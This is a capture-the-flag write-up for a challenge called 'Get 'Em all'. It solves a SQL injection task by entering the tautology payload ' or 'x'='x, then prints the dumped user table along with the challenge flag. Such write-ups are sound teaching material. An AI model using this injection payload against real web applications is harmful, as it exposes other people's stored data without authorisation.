Recently Updated
Get ‘Em all
Challenge I think one of the users data fields holds a flag. If only you could find the username. Link
Solution SQL injection challenge, we enter the following in the input field:
1
' or 'x'='x
and get the following output, which includes the flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Name: Luke
Data: I made this problem.
Name: Alec
Data: Steam boys.
Name: Jalen
Data: Pump that iron fool.
Name: Eric
Data: I make cars.
Name: Sam
Data: Thinks he knows SQL.
Name: fl4g__giv3r
Data: ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}
Name: snoutpop
Data: jowls
Name: Chunbucket
Data: @datboiiii
Flag
ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}